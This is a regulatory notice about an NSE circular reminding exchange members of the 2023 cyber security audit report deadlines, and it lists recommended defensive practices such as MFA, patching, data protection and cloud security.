NSE vide circular dated June 19, 2023 has issued a Reminder for Submission of Cyber Security and Cyber Resilience Audit Report for the period ended March 31, 2023. NSE circular dated May 17, 2023 mandated all the members to submit the Cyber Security and Cyber Resilience Audit Report for the period ended March 31, 2023, to the Exchange on or before June 30, 2023.
As per this circular, Preliminary Audit Report shall be submitted by June 30, 2023, Corrective Action taken Report (ATR)(If applicable) shall be submitted by September 30, 2023 and Follow-on Audit Report Submission (If applicable) shall be submitted by December 31, 2023.
The submission of Cyber Security & Cyber Resilience Audit Report is mandatory for all active Members of the Exchange. Submission is to be made electronically through ENIT Member Portal on or before due date, to avoid any penal/disciplinary action.
The following are the significant measures suggested as best cyber security practices:
Measures against Phishing Attacks/Websites:
- Proactive monitoring of cyberspace to identify phishing websites related to the organization’s domain and reporting them to the appropriate authorities for action.
- Implementing security awareness campaigns to educate employees about the risks of clicking on links and attachments in emails. Referring to advisories issued by CERT-In/CSIRT-Fin for conducting exercises on public awareness.
Patch Management and Vulnerability Assessment and Penetration Testing (VAPT):
- Regularly updating operating systems and applications with the latest patches. Considering virtual patching as an interim measure for zero-day vulnerabilities and where patches are not available.
- Conducting security audits and VAPT of applications in accordance with SEBI’s circulars. Resolving any observed gaps within the prescribed timelines.
Measures for Data Protection and Data Breach:
- Preparing a detailed incident response plan.
- Enforcing effective data protection, backup, and recovery measures.
- Implementing encryption for data at rest to prevent unauthorized access.
- Identifying and classifying sensitive and Personally Identifiable Information (PII) data and applying encryption measures for data in transit and at rest.
- Deploying data leakage prevention (DLP) solutions/processes.
- Implementing a strong log retention policy in compliance with SEBI regulations, CERT-In requirements, and the IT Act 2000.
- Auditing the collection of all logs and monitoring them to identify unusual patterns and behaviors.
Password Policy/Authentication Mechanisms:
- Implementing a strong password policy, including periodic review of ex-employee accounts, prohibiting password reuse, and avoiding storage of password lists on systems.
- Enabling multi-factor authentication (MFA) for all users, particularly for online/internet connections, virtual private networks, webmail, and critical systems.
- Implementing a Maker and Checker framework for modifying user rights and enabling MFA for user accounts accessing critical applications.
- Implementing a Maker-Checker framework for modifying user rights in internal applications.
- Implementing a “least privilege” approach to mitigate insider threats and provide security for both on- and off-premises resources.
- Deploying web and email filters on the network to scan and block known bad domains, sources, and addresses.
- Blocking malicious domains/IPs after verification and referring to CSIRT-Fin/CERT-In advisories for the latest information.
- Restricting the execution of “powershell” and “wscript” in enterprise environments, using the latest version of PowerShell with enhanced logging, and utilizing host-based firewalls to limit attack activities.
- Whitelisting business-essential ports at the firewall level and blocking all other ports by default.
Security of Cloud Services:
- Checking the public accessibility of all cloud instances to prevent inadvertent data leakage.
- Ensuring proper security of cloud access tokens, avoiding their exposure in website source code or configuration files.
- Implementing appropriate security measures for testing, staging, and backup environments hosted on the cloud and keeping them segregated from the production environment.
- Considering hybrid data security tools that operate in a shared responsibility model for cloud-based environments.